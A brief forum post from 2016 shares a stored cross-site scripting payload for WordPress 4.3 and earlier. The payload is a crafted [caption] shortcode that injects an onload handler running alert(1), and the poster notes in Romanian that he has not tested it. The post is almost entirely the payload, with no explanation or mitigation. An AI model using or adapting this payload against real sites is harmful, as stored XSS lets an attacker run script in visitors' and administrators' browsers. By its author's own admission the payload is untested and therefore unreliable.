Nytro Posted March 2, 2016 Report Posted March 2, 2016 Wordpress <= 4.3 Stored XSS [caption width="1" caption='<img src="//google.com/favicon.ico?' ">]</a><a href="http://onload='alert(1)'"> PS: Nu l-am testat. 4 Quote